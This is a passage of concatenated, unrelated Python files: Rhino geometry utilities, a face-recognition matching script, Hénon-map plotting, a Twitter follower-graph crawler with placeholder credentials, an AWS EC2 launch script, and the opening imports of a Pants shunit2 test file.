polyline
"""
return rc.Geometry.Polyline(self._hull_points)
def minBoundingBox(crv):
"""Returns the minimal 2d bounding box of a curve or surface.
Parameters:
crv (curve) = planar curve or surface
Returns:
polylineCurve = min polyline based on area
"""
#Get control points
P = rs.CurveEditPoints(crv)
p = []
for i in range(0, len(P)-1):
p.append(P[i])
#get The convex hull
hull = ConvexHull(p)
convexHull = hull.get_polyline()
minArea = None
minBoundary = None
plane = crv.TryGetPlane()[1]
normal = plane.Normal
#For each edge
for i in range(convexHull.SegmentCount):
edge = convexHull.SegmentAt(i)
segVec = edge.PointAt(0) - edge.PointAt(1)
yVec = rs.VectorCrossProduct(normal, segVec)
plane = rg.Plane(rs.coerce3dpoint((0,0,0)), segVec, yVec)
bbPts = rs.BoundingBox(crv, view_or_plane = plane)
newPts = bbPts[:4]
newPts.append(bbPts[0])
pline = rg.PolylineCurve(newPts)
am = rg.AreaMassProperties.Compute(pline)
area = am.Area
if area < minArea or minArea is None:
minArea = area
minBoundary = pline
return minBoundary
#Pts
def MidPoint(pt1, pt2):
"""
    MidPoint(pt1, pt2)
input:
pt1 = rc point
pt2 = rc point
return:
new rc point
"""
x = util.Remap(.5, 0, 1, min(pt1.X, pt2.X), max(pt1.X, pt2.X))
y = util.Remap(.5, 0, 1, min(pt1.Y, pt2.Y), max(pt1.Y, pt2.Y))
z = util.Remap(.5, 0, 1, min(pt1.Z, pt2.Z), max(pt1.Z, pt2.Z))
return rc.Geometry.Point3d(x,y,z)
def PointBetweenPoints(pt1, pt2, t = .5):
"""
pointBetweenPoints(pt1, pt2, t = .5)
input:
pt1 = rc point
pt2 = rc point
t = normalized pt between pt1 and pt2
return:
new rc point
"""
line = rg.Line(pt1, pt2)
return line.PointAt(t)
def RandomPoint(x0 = 0, x1 = 100, y0 = 0, y1 = 100, z0 = 0, z1 = 100):
"""Randomly creates point between x0->x1, y0->y1, and z0->z1domains
"""
return rg.Point3d(random.uniform(x0,x1), random.uniform(y0,y1),random.uniform(z0,z1))
def RemoveDuplicatePts(points):
# Create a dictionary to keep track of the Id
pointDict = {}
ptList = []
for pt in points:
pt3d = rs.coerce3dpoint(pt)
pointDict[pt3d] = pt
ptList.append(pt3d)
#sortList
ptList.sort()
ptLast = ptList[-1]
tol = sc.doc.ModelAbsoluteTolerance
for i in range(len(ptList)-2,-1,-1):
if (abs(ptList[i][0]-ptLast[0]) < tol) and (abs(ptList[i][1]-ptLast[1])) < tol and (abs(ptList[i][2]-ptLast[2]) < tol):
del ptList[i]
else:
ptLast = ptList[i]
    #find the ids with the new list
outputList = []
for pt in ptList:
ptId = pointDict[pt]
outputList.append(ptId)
return outputList
def CentroidOfPoints(pts):
centerPt = rg.Point3d(0,0,0)
for pt in pts:
centerPt += pt
return centerPt/len(pts)
#Vectors
def VectorDisplay(point, vector, accel):
endPt = rc.Geometry.Point3d.Add(point, vector)
accelEndPt = rc.Geometry.Point3d.Add(endPt, accel)
line1 = rc.Geometry.Line(point, endPt)
line2 = rc.Geometry.Line(endPt, accelEndPt)
return sc.doc.Objects.AddLine(line1), sc.doc.Objects.AddLine(line2)
def DotProduct(a, b):
return a.X*b.X + a.Y*b.Y + a.Z*b.Z
def VectorAngle(a, b):
    return math.acos(DotProduct(a, b) / (a.Length*b.Length))
def VectorLimit(vector, t):
if vector.Length >= t:
vector.Unitize()
vector *= t
return vector
def RandomVector(size = 1):
"""Random 2d vector
parameters:
size(float)[optional]: length of return vector
returns:
Vector3d
"""
vec = rg.Vector3d(random.uniform(-1, 1), random.uniform(-1, 1), 0)
vec.Unitize()
vec *= size
return vec
def RandomVector3d(amp = None):
"""
returns random unitized vector
if amp: returns vector of length amp
"""
vec = rg.Vector3d(random.uniform(-1,1), random.uniform(-1, 1), random.uniform(-1,1))
vec.Unitize()
if amp:vec *= amp
return vec
def GetCornerVecs(pts, leftHanded = False, amplitude = 1):
"""
Returns the corner vector
parameters:
pts (Point3d)[list]: list of verticies
leftHanded (bool, optional): if True, will get left hand side vecs
amplitude (float, optional): amplitude of the returned vecs
returns:
Vector3d [list]
"""
def GetCornerVec(pt0, pt1, pt2):
ang = util.AngleABC(pt0, pt1, pt2)
vec0 = pt0-pt1
vec1 = pt2-pt1
vec0.Unitize()
vec1.Unitize()
cornerVec = (vec0 + vec1)/2
cornerVec.Unitize()
if ang < 180:
cornerVec.Reverse()
return cornerVec
cornerVecs = []
for i in range(len(pts)):
vec = GetCornerVec(pts[(i-1)%len(pts)], pts[(i)%len(pts)], pts[(i+1)%len(pts)])
vec *= amplitude
if leftHanded:
vec.Reverse()
cornerVecs.append(vec)
return cornerVecs
#Curves
def SplitSelfIntersection(crv, safety = 0):
"""Splits curves into clockwise and counterclockwise loops at self intersection.
parameters:
crv: Closed planar curve
returns:
cw loops [list]
cc loops [list]
"""
safety += 1
cwLoops = []
ccLoops = []
    #Reparameterize
newDomain = rg.Interval(0,1)
crv.Domain = newDomain
#Check for self intersection
events = rg.Intersect.Intersection.CurveSelf(crv, sc.doc.ModelAbsoluteTolerance)
#print "{} intersections".format(len(events))
#Collect intersection parameters
parameters = [0]
if len(events) > 0:
for event in events:
parameters.append(event.ParameterA)
parameters.append(event.ParameterB)
else:
if crv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops = [crv]
else:
cwLoops = [crv]
return cwLoops, ccLoops
parameters.append(1)
parameters.sort()
#Split into segments
segments = []
for i in range(len(parameters)-1):
segments.append(crv.Trim(parameters[i], parameters[i+1]))
#If segments are closed themselves, add to loop list
segmentsToRemove = []
for segment in segments:
if segment.IsClosed:
if segment.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops.append(segment)
else:
cwLoops.append(segment)
segmentsToRemove.append(segment)
for segment in segmentsToRemove:
segments.remove(segment)
#Join segments to make new loops
newCrv = rg.PolyCurve()
for segment in segments:
newCrv.Append(segment)
events = rg.Intersect.Intersection.CurveSelf(newCrv, sc.doc.ModelAbsoluteTolerance)
if len(events) > 0 and safety < 10:
#Enter recursion
cwResults, ccResults = SplitSelfIntersection(newCrv, safety)
for result in ccResults:
ccLoops.append(result)
for result in cwResults:
cwLoops.append(result)
else:
if newCrv.ClosedCurveOrientation() == rg.CurveOrientation.CounterClockwise:
ccLoops.append(newCrv)
else:
cwLoops.append(newCrv)
return cwLoops, ccLoops
def CustomOffset(crv, iter_d, rd):
"""
parameters:
crv: Rhino curve
inter_d (float): offset distance
rd: rebuild distance
returns:
crv [list]: curves in same orientation as input crv
"""
n = int(crv.GetLength() / rd)
if n < 3:
n = 3
crv = crv.Rebuild(n, 3, True)
params = crv.DivideByCount(n, False)
newPts = []
for param in params:
pt = crv.PointAt(param)
tan = crv.TangentAt(param)
tan.Rotate(math.radians(90), rg.Vector3d(0,0,1))
tan.Unitize()
tan *= iter_d
newPt = rg.Point3d.Add(pt, tan)
newPts.append(newPt)
newCrv = rg.NurbsCurve.Create(True, 3, newPts)
cwCrvs, ccCrvs = SplitSelfIntersection(newCrv)
if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise:
return cwCrvs
else:
return ccCrvs
#Geometry
def Cone(pt, vec, range, radius):
"""arcPtVecInt(pt, vec, range)
input:
pt: center point of arc
vec:(vector) direction of arc
range:(float in degrees) Vision cone, aligned to vector
radius: (float) radius
return:
rc arc
"""
perpVec = rc.Geometry.Vector3d(-vec.Y, vec.X, 0)
plane = rc.Geometry.Plane(pt, vec, perpVec)
plane.Rotate(math.pi, plane.Normal)
circle = rc.Geometry.Circle(plane, radius)
interval = rc.Geometry.Interval(math.pi+math.radians(range/2), math.pi-math.radians(range/2))
arc = rc.Geometry.Arc(circle, interval)
line1 = rc.Geometry.LineCurve(pt, arc.StartPoint)
line2 = rc.Geometry.LineCurve(arc.EndPoint, pt)
polycurve = rc.Geometry.PolyCurve()
polycurve.Append(arc)
polycurve.Append(line2)
polycurve.Append(line1)
return polycurve
def LineCurveLineCurveDistance(crv1, crv2):
    """
    parameters:
crv1 (LineCurve):
crv2 (LineCurve):
returns:
float: distance between two curves
LineCurve: line between two closestPoints (if curves touching, returns True)
"""
result = rg.Intersect.Intersection.CurveCurve(crv1, crv2, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance)
if result.Count > 0:
d = 0
line = result[0]
else:
crv1Pts = [crv1.PointAtStart, crv1.PointAtEnd]
crv2Pts = [crv2.PointAtStart, crv2.PointAtEnd]
closestDist = None
closestCrv1Pt = None
closestCrv2Pt = None
for crv1Pt in crv1Pts:
closestParamOnCrv2 = crv2.ClosestPoint(crv1Pt, 0)
closestPtOnCrv2 = crv2.PointAt(closestParamOnCrv2[1])
dist = rs.Distance(crv1Pt, closestPtOnCrv2)
if dist < closestDist or closestDist is None:
closestDist = dist
closestCrv1Pt = crv1Pt
closestCrv2Pt = closestPtOnCrv2
for crv2Pt in crv2Pts:
closestParamOnCrv1 = crv1.ClosestPoint(crv2Pt, 0)
closestPtOnCrv1 = crv1.PointAt(closestParamOnCrv1[1])
dist = rs.Distance(crv2Pt, closestPtOnCrv1)
if dist < closestDist or closestDist is None:
closestDist = dist
closestCrv1Pt = closestPtOnCrv1
closestCrv2Pt = crv2Pt
d = closestDist
line = rg.LineCurve(closestCrv1Pt, closestCrv2Pt)
return d, line
def IsCurveInsideCurve(plineCrv, testCrv):
"""IsCurveInsideCurve(plineCrv, testCrv)
parameters:
plineCrv (curve): closed polylineCurve
testCrv (curve): curve to test if inside plineCrv
returns:
0 - Outside
1 - Intersecting
2 - Inside
"""
result = rg.Intersect.Intersection.CurveCurve(plineCrv, testCrv, sc.doc.ModelAbsoluteTolerance, sc.doc.ModelAbsoluteTolerance)
if len(result)>0:
return 1
if plineCrv.Contains(testCrv.PointAtStart) == rg.PointContainment.Inside or plineCrv.Contains(testCrv.PointAtEnd) == rg.PointContainment.Inside:
return 2
return 0
def main():
obj = rs.GetObject("Select Objects", preselect = True)
obj = rs.coercecurve(obj)
cw, cc = SplitSelfIntersection(obj)
#bbox = minBoundingBox(obj)
for crv in cw:
sc.doc.Objects.AddCurve(crv)
for crv in cc:
sc.doc.Objects.AddCurve(crv)
#Classes
class Particle():
def __init__(self, pos = rg.Point3d(0,0,0), vel = rg.Vector3d(0,0,0)):
self.pos = pos
self.vel = vel
self.acc = rg.Vector3d(0,0,0)
self.id = None
self.radius = 0
def Update(self):
futurePos = rg.Point3d.Add(self.pos, self.vel)
if futurePos.X < self.radius:
self.vel.X *= -1
if futurePos.Y < self.radius:
self.vel.Y *= -1
if futurePos.Z < self.radius:
self.vel.Z *= -1
if futurePos.X > 100-self.radius:
self.vel.X *= -1
if futurePos.Y > 100-self.radius:
self.vel.Y *= -1
if futurePos.Z > 100-self.radius:
self.vel.Z *= -1
self.vel += self.acc
self.pos += self.vel
def UpdateDisplay(self):
if self.id:sc.doc.Objects.Delete(self.id, True)
self.id = sc.doc.Objects.AddPoint(self.pos)
if __name__ == "__main__":
pts = []
for i in range(10):
pts.append(RandomPoint())
mesh = DelaunayMesh(pts, rg.Plane.WorldXY)
sc.doc.Objects.AddMesh(mesh)
|
from os.path import exists
import pickle
from typing import List
import colorama
import face_recognition
import os
import cv2
import json
from picture import Picture
from colorama import Fore, Back, Style
colorama.init(autoreset=True)
KNOWN_FACES_DIR = "../known-images"
LOADED_FACES_FILE = f"../loaded-faces.pickle"
FACE_TO_MATCH = "../unknown-images/to_match.jpg"
TOLERANCE = 0.6
FRAME_THICKNESS = 3
FONT_THICKNESS = 2
MODEL = "hog" # Could also be cnn
def load_pictures_objects(pictures_path: str):
pictures = []
for name in os.listdir(pictures_path):
for filename in os.listdir(f"{pictures_path}/{name}"):
relative_path = f'{pictures_path}/{name}/{filename}'
print(f'loading {relative_path}')
image = face_recognition.load_image_file(relative_path)
locations = face_recognition.face_locations(image, model=MODEL)
encodings = face_recognition.face_encodings(image, locations)
pictures.append(Picture(relative_path, encodings, locations))
return pictures
def serialize_pictures(pictures: List[Picture], fileToCreate: str):
with open(fileToCreate, 'wb') as file:
pickle.dump(pictures, file, protocol=pickle.HIGHEST_PROTOCOL)
def deserialize_pictures(fileToRead):
with open(fileToRead, "rb") as file:
pictures = pickle.load(file)
return pictures
pictures = []
if exists(LOADED_FACES_FILE):
print("Loading stored images...")
pictures = deserialize_pictures(LOADED_FACES_FILE)
else:
print("Storing all images...")
pictures = load_pictures_objects(KNOWN_FACES_DIR)
serialize_pictures(pictures, LOADED_FACES_FILE)
#known_locations = []
known_faces = []
known_names = []
for i in pictures:
known_faces.append(i.encodings)
known_names.append(i.name)
print('done!')
print("processing unknown face")
#for filename in os.listdir(UNKNOWN_FACES_DIR):
#print(filename)
image = face_recognition.load_image_file(FACE_TO_MATCH)
#locations = face_recognition.face_locations(image, model=MODEL)
encoding = face_recognition.face_encodings(image)[0]
for index, i in enumerate(pictures):
#print(f"{index + 1}- comparing {FACE_TO_MATCH} with face(encoding) of {i.name}")
#print(f"{i.name} has {len(i.encodings)} face(s)(encoding)")
if len(i.encodings) == 0:
print(f"Picture not found in {i.name}!")
else:
results = face_recognition.compare_faces(i.encodings, encoding, tolerance=TOLERANCE)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
if True in results:
#print(f"{i.name} has {len(i.encodings)} face(s)(encoding)")
print(Fore.GREEN + f'{i.name} MATCH')
#else:
#print(Fore.RED + 'NOT A MATCH')
#print('------------------------------------------')
#print()
#for face_encoding, face_location, in zip(encodings, locations):
# results = face_recognition.compare_faces(known_faces, face_encoding, TOLERANCE)
# print()
# match = None
# if True in results:
# match = known_names[results.index(True)]
# print(f"Match found: {match}")
# top_left = (face_location[3], face_location[0])
# bottom_right = (face_location[1], face_location[2])
# color = [200, 162, 47]
# cv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)
# top_left = (face_location[3], face_location[2])
# bottom_right = (face_location[1], face_location[2] + 22)
# cv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)
# cv2.putText(image, match, (face_location[3]+10, face_location[2]+15), cv2.FONT_HERSHEY_COMPLEX, 0.5, (200,200,200), FONT_THICKNESS)
#cv2.imshow(filename, image)
#cv2.waitKey(200000)
#cv2.destroyWindow(filename)
|
import numpy as np
from matplotlib.pyplot import figure, cm, show
import full_henon as fh
import helper as he
def basin_attr(xVals, yVals, xSize, ySize, its=100, a=1.4, b=0.3):
""" Function that creates the basin of attraction """
# Creating x and y starting values
xRange = np.linspace(xVals[0], xVals[1], xSize)
yRange = np.linspace(yVals[1], yVals[0], ySize)
grid = np.zeros((ySize, xSize)) # Grid
    # Looping over all starting values
for xInd, x0 in enumerate(xRange):
for yInd, y0 in enumerate(yRange):
xv, yv = fh.Henon(x0, y0, its, a, b, div=True, threshold=1e2)
            if xv is not None: grid[yInd][xInd] += 1
return grid
def plot_basin(saveFig=None):
""" Function that plots the basin of attraction. """
# Values for creating the grid and plot
xVals = (-2, 2) # Range of x values
yVals = (-3, 5) # Range of y values
xSize = 2048 # Number of x pixels
ySize = 1080 # Number of y pixels
numb = 5 # Number of x and y ticks for the plot
# Axes labels and ticks
xLabels = np.linspace(xVals[0], xVals[1], numb).astype(int)
yLabels = np.linspace(yVals[0], yVals[1], numb).astype(int)
xLocs = np.linspace(0, xSize, numb)
yLocs = np.linspace(ySize, 0, numb)
# Finding the trapping region
trappingRegion = basin_attr(xVals, yVals, xSize, ySize, its=25)
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame.imshow(trappingRegion, cmap=cm.binary)
# Axes labeling and ticks
frame.set_xlabel(r"$x_0$", fontsize=20)
frame.set_ylabel(r"$y_0$", fontsize=20)
frame.set_xticks(xLocs)
frame.set_yticks(yLocs)
frame.set_xticklabels(xLabels, fontsize=15)
frame.set_yticklabels(yLabels, fontsize=15)
if saveFig != None: fig.savefig(saveFig)
else: show()
def trapp_region(saveFig=None, output=False):
""" Function that plots the trapping region of the Hénon map """
# Vertices (see Peitgens et al.)
P1 = (-1.33, 0.42)
P2 = (1.32, 0.133)
P3 = (1.245, -0.14)
P4 = (-1.06, -0.5)
# Creating the lines
Vert1 = he.Create_Line(P1, P2)
Vert2 = he.Create_Line(P2, P3)
Vert3 = he.Create_Line(P3, P4)
Vert4 = he.Create_Line(P4, P1)
# Combining the points and vertices in lists
ps = [P1, P2, P3, P4]
vs = [Vert1, Vert2, Vert3, Vert4]
if output: return ps, vs
# Generating points of the Hénon map
xv, yv = fh.Henon(0, 0, int(1e4), 1.4, 0.3)
# Plotting
fig = figure(figsize=(10,8))
frame = fig.add_subplot(1,1,1)
frame.scatter(xv, yv, s=0.01, label='points', color='darkblue', marker='.')
for i in range(len(ps)):
frame.scatter(ps[i][0], ps[i][1], color='crimson', marker='o', s=50)
frame.plot(vs[i][0], vs[i][1], color='seagreen', linestyle='--', lw=1.8)
frame.set_xlabel("x", fontsize=20)
frame.set_ylabel("y", fontsize=20)
frame.grid()
if saveFig != None: fig.savefig(saveFig)
else: show()
def plot_n_img(n_start=0, n_end=8, output=False, plot=True, saveFig=None,
color=['indigo'], lw=[1], av1=1.4, bv1=0.3):
""" Function that creates the image of a geometrical shape using the Hénon
map. The initial vertices of the geometric shape are given by the input
parameter 'init_vert'. This function is able to generate multiple images
based on the initial input. This implies that the Hénon map will be
applied multiple times to the initial conditions based on the input.
'n_start' gives the lowest order image. So n_start=0 is the image
obtained after the map has acted on it once; 'n_end' gives the highest
order image. It is possible to select which output is desirable, either
a list containing all images or a plot showing the images or both.
Input: n_start = lowest order image (integer);
n_end = highest order image (integer);
output = whether or not the boundaries in a list are the
output (Boolean);
plot = whether or not a plot has to be made (Boolean);
saveFig = if the figure has to be saved (None or string);
color = color of the images (list);
lw = line widths of the different images (list);
av1 = a parameter of the Hénon map (float);
bv1 = b parameter of the Hénon map (float);
Returns: optional: all_bounds = list containing the images (list).
"""
# Starting values
j = 0
points, vert = trapp_region(output=True)
count = 0
# Empty list to put the boundaries in
if output: all_bounds = []
# Initializing the plot
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
for ind, v in enumerate(vert):
frame.scatter(points[ind][0], points[ind][1], color='crimson',
marker='o', s=65, zorder=3)
frame.plot(v[0], v[1], color='seagreen', linestyle='--', lw=2)
# Looping
while j <= n_end:
bounds = he.image_func(vert, av1, bv1)
# Checking if the values need to be added to the boundaries
if j >= n_start and j <= n_end:
if output: all_bounds.append(bounds)
for ind, b in enumerate(bounds):
if ind == 0:
frame.plot(b[0], b[1], label=f"Image {j+1}", zorder=3-j/10,
color=color[count], lw=lw[count])
else:
frame.plot(b[0], b[1], color=color[count], lw=lw[count])
count += 1
# New conditions for the next loop
vert = bounds
j += 1
# Finishing the plot
frame.set_xlabel(r"$x$", fontsize=20)
frame.set_ylabel(r"$y$", fontsize=20)
frame.tick_params(axis="both", labelsize=15)
frame.legend(fontsize=20)
frame.grid()
if saveFig != None: fig.savefig(str(saveFig))
elif plot: show()
elif output: return all_bounds
|
import twitter
import sys
import json
import time
import networkx
import operator
import pickle
from pathlib import Path
import matplotlib.pyplot as plt
def oauth_login():
# XXX: Go to http://twitter.com/apps/new to create an app and get values
# for these credentials that you'll need to provide in place of these
# empty string values that are defined as placeholders.
# See https://dev.twitter.com/docs/auth/oauth for more information
# on Twitter's OAuth implementation.
CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX'
OAUTH_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXX'
OAUTH_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth = twitter.oauth.OAuth(OAUTH_TOKEN, OAUTH_TOKEN_SECRET, CONSUMER_KEY, CONSUMER_SECRET)
twitter_api = twitter.Twitter(auth=auth)
return twitter_api
twitter_api = oauth_login()
def parsedUserShow(ID):
parsedUserShowDB = {}
my_file = Path("parsedUserShowDB.txt")
if my_file.is_file():
with open("parsedUserShowDB.txt", "rb") as f:
try:
parsedUserShowDB = pickle.load(f)
except EOFError:
print("EOF Error, initializing empty DB")
if ID in parsedUserShowDB:
return parsedUserShowDB[ID]
else: #Should always be true when user not yet in DB
UserResponseShow = twitter_api.users.show(user_id = ID)
UserDumps = json.dumps(UserResponseShow, indent=1)
UserResponseParsed = json.loads(UserDumps) #This is the User Data Dictionary
parsedUserShowDB[ID] = UserResponseParsed
with open("parsedUserShowDB.txt", "wb") as f:
pickle.dump(parsedUserShowDB, f)
return UserResponseParsed # type dict
#End of parsedUserShow
def top5(reciprocals_dict):
top5Dict = {}
#If there are 5 or less reciprocals the top 5 will be all of the reciprocals
if(len(reciprocals_dict) <= 5 ):
top5Dict = reciprocals_dict
else:
#figure out which of the 5 reciprocals have the most followers
reciprocalsSorted = ( sorted( reciprocals_dict.items(), key=operator.itemgetter(1) ) ) # List of tuples sorted by follower count
        reciprocalsSorted.reverse() # We get the list sorted in ascending order but want it descending so we can choose the first 5
#First 5 pairs will be the top 5
for i in range(5):
id = reciprocalsSorted[i][0]
followerCount = reciprocalsSorted[i][1]
top5Dict.update({id : followerCount})
return top5Dict
def dictionaryOfReciprocals(reciprocals_set):
reciprocalsDict = {}
for i in reciprocals_set:
reciprocalData = parsedUserShow(i)
reciprocalID = reciprocalData['id']
reciprocalFollowersCount = reciprocalData['followers_count']
reciprocalPair = {reciprocalID : reciprocalFollowersCount}
reciprocalsDict.update(reciprocalPair)
return reciprocalsDict
class socialNode():
#Instance variables
#twitter_id = 0
#twitter_handle = "NONE"
#number_of_followers = 0
#list_of_friends = [] Will be list of all friends as returned from Twitter API
#dict_of_reciprocals = () dictionary of reciprocals
    #top_5 = {} # Will be a dictionary of the 5 reciprocals with most followers, 'id': number_of_followers
def __init__(self, *args, twitter_id = 0, twitter_handle = "NONE"):
my_file = Path("SocialNodesDB.txt")
if my_file.is_file():
with open("SocialNodesDB.txt", "rb") as f:
try:
SocialNodesDB = pickle.load(f)
except EOFError:
print("EOF Error, initializing empty DB")
SocialNodesDB = {}
else:
with open("SocialNodesDB.txt", "wb") as f:
SocialNodesDB = {}
pickle.dump(SocialNodesDB, f)
if(twitter_id in SocialNodesDB):# In case we have seen this user node before and have it cached
socialNodeDict = SocialNodesDB[twitter_id]
#print(SocialNodesDB)
UserResponseParsed = socialNodeDict["UserResponseParsed"]
#Instantiates class variables on user data
#TO-DO IMPLEMENT CACHE TO CACHE ALL THIS DATA
self.twitter_id = UserResponseParsed['id'] #int
self.twitter_handle = UserResponseParsed['screen_name'] # string
self.number_of_followers = UserResponseParsed['followers_count'] # int
self.list_of_followers = socialNodeDict["list_of_followers"] # list
self.list_of_friends = socialNodeDict["list_of_friends"]
self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals
self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount }
#socialNodeInfo = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers,
# "list_of_friends" : self.list_of_friends}
else: # In case the user is new
UserResponseParsed = parsedUserShow(twitter_id)
#Instantiates class variables on user data
self.twitter_id = UserResponseParsed['id'] #int
self.twitter_handle = UserResponseParsed['screen_name'] # string
self.number_of_followers = UserResponseParsed['followers_count'] # int
self.list_of_followers = json.loads( json.dumps( twitter_api.followers.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list
self.list_of_friends = json.loads( json.dumps(twitter_api.friends.ids(user_id = self.twitter_id, count = 5000), indent = 1 ) )['ids'] # list
self.dict_of_reciprocals = dictionaryOfReciprocals(set(self.list_of_followers) & set(self.list_of_friends)) # dictionary of a set of reciprocals
self.top5 = top5(self.dict_of_reciprocals) # dict { id : followerCount }
socialNodeDict = {"UserResponseParsed" : UserResponseParsed, "list_of_followers" : self.list_of_followers,
"list_of_friends" : self.list_of_friends}
SocialNodesDB[self.twitter_id] = socialNodeDict
with open("SocialNodesDB.txt", "wb") as f:
pickle.dump(SocialNodesDB, f)
#End of Init
#This will return a graph with our node in the middle and edges to the top 5
def top5Graph(originalNode):
top5Dict = originalNode.top5
top5Graph = networkx.Graph()
originalNodeID = originalNode.twitter_id
top5Graph.add_node(originalNodeID)
for ID in top5Dict:
top5Graph.add_node(ID)
top5Graph.add_edge(originalNodeID, ID)
return top5Graph
#This class is made to handle the Graph portion so it should not call the twitter API
class socialNetwork():
#networkGraph = networkx.Graph()
#initialNode = socialNode()
def __init__(self, initialNode):
#Instantiates initialNode
self.initialNode = initialNode
self.initialNodeID = initialNode.twitter_id
        self.visited = [] # These are not the IDs of nodes in the graph; they are the IDs of the nodes whose Top 5 we have already fetched
#Creates graph
self.networkGraph = networkx.Graph()
#Utilizing gpickle to save time in future runs
self.gpickleFileName = str(self.initialNodeID) + ".gpickle"
if(Path(self.gpickleFileName).is_file()):
self.networkGraph = networkx.read_gpickle(self.gpickleFileName)
print("Loaded pickle graph save with " + str(self.networkGraph.number_of_nodes())+ " nodes")
#Saving visited
try:
with open((str(self.initialNodeID) + '.txt'), 'rb') as f:
self.visited = pickle.load(f)
except:
with open((str(self.initialNodeID) + '.txt'), 'wb') as f:
pickle.dump(self.visited, f)
print("Loaded pickle visited list with " + str(len(self.visited)) + " visited nodes")
else: # Adds initial node to graph
self.networkGraph.add_node(self.initialNodeID)
def returnDiameter(self):
return networkx.diameter(self.networkGraph)
def returnAverageDistance(self):
return networkx.average_shortest_path_length(self.networkGraph)
# size and node must be passed as parameters
# this is the crawler
def expandNetwork(self, **kwargs):
#Here is where we populate the graph with the top 5 of the top 5 until we reach around the size we want
bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID)
bfs_edges_list = list(bfs_edges)
print(bfs_edges_list)
        #Terminating case: the graph size is re-checked on every iteration, so the loop
        # stops at roughly the requested size; we'll end up with around 25 more nodes than asked for
while(self.networkGraph.number_of_nodes() < kwargs['size']):
if((len(self.visited) > 0 and bfs_edges == 0)):
print("Problem")
break
selectedNode = self.initialNode
selectedNodeID = selectedNode.twitter_id
#Determine next node via BFS
bfs_edges = networkx.bfs_edges(self.networkGraph, self.initialNodeID)
bfs_edges_list = list(bfs_edges)
if(int(self.networkGraph.number_of_nodes()) != 0): #Always true except for first node
for edge in bfs_edges_list:
#if node not in graph, that is selected node
endingNodeID = edge[1]
if(endingNodeID not in self.visited):
try:
selectedNode = socialNode(twitter_id = endingNodeID)
selectedNodeID = selectedNode.twitter_id
                    except: # Normally triggered by a "not authorized" error when the profile is private
                        print("Could not use node " + str(endingNodeID) + "; the profile is probably set to private")
selectedNodeID = endingNodeID
break
#To prevent double entries
if(selectedNodeID not in self.visited):
self.visited.append(selectedNodeID)
#Get a graph from selected node, initially our first node, max of 5 nodes
selectedTop5Graph = top5Graph(selectedNode)
# Add top 5 graph of selected node to our graph
self.networkGraph = networkx.compose(self.networkGraph, selectedTop5Graph)
print(selectedNodeID)
print(self.networkGraph.number_of_nodes())
#Writes to pickle to save time in future runs
networkx.write_gpickle(self.networkGraph, self.gpickleFileName)
with open((str(self.initialNodeID) + '.txt'), 'wb') as f:
pickle.dump(self.visited, f)
time.sleep(2)
#end of while loop
#self.expandNetwork(size = kwargs['size'])
#end of expandNetwork
#THIS SHOULD NOT BE RECURSION
def networkDraw(self):
networkx.draw(self.networkGraph, with_labels=True, font_weight="bold")
plt.show()
if __name__ == '__main__':
    print('THIS SHOULD NOT BE RUN AS MAIN AND DOES NOTHING; IT IS A MODULE TO IMPORT INTO THE MAIN MODULE')
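# Example driver usage (hypothetical ID; requires valid Twitter API credentials
# configured for twitter_api above):
#   node = socialNode(twitter_id=123456789)
#   network = socialNetwork(node)
#   network.expandNetwork(size=50)   # crawl until roughly 50 nodes are in the graph
#   print(network.returnDiameter(), network.returnAverageDistance())
#   network.networkDraw()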
|
import time
import boto3
from collections import defaultdict
region = 'us-east-1'
ami = 'ami-0fe23c115c3ba9bac'
# region = 'us-west-2'
# ami = 'ami-01bbe152bf19d0289'
ec2 = boto3.resource('ec2', region_name=region)
instance = ec2.create_instances(
ImageId=ami,
IamInstanceProfile={
'Name': 'sandbox-ec2-assume-role',
},
MinCount=1,
MaxCount=1,
SecurityGroupIds=['sg-065521436b78e83ba'],
KeyName='sandbox',
InstanceType='t2.micro'
)
time.sleep(5)
# Get information for the newly created instances (still in the 'pending' state)
instance_status = ec2.instances.filter(Filters=[{
'Name': 'instance-state-name',
'Values': ['pending']}])
ec2info = defaultdict()
for instance in instance_status:
ec2info[instance.id] = {
'Type': instance.instance_type,
'ID': instance.id,
'Private IP': instance.private_ip_address,
'Public IP': instance.public_ip_address,
'State': instance.state['Name'],
}
attributes = ['Type', 'ID', 'Private IP', 'Public IP', 'State']
for instance_id, instance in ec2info.items():
for key in attributes:
print("{0}: {1}".format(key, instance[key]))
print("-------------------------")
|
print("Criando um novo arquivo pelo GitHub e usando o git pull para puxar")
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.target_types import PexBinary, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_type_rules
from pants.backend.python.util_rules import pex_from_targets
from pants.backend.shell import shunit2_test_runner
from pants.backend.shell.shunit2_test_runner import (
Shunit2FieldSet,
Shunit2Runner,
Shunit2RunnerRequest,
Shunit2TestRequest,
)
from pants.backend.shell.target_types import (
ShellSourceTarget,
Shunit2Shell,
Shunit2ShellField,
Shunit2TestsGeneratorTarget,
)
from pants.backend.shell.target_types import rules as target_types_rules
from pants.core.goals.test import (
TestDebugRequest,
TestResult,
build_runtime_package_dependencies,
get_filtered_environment,
)
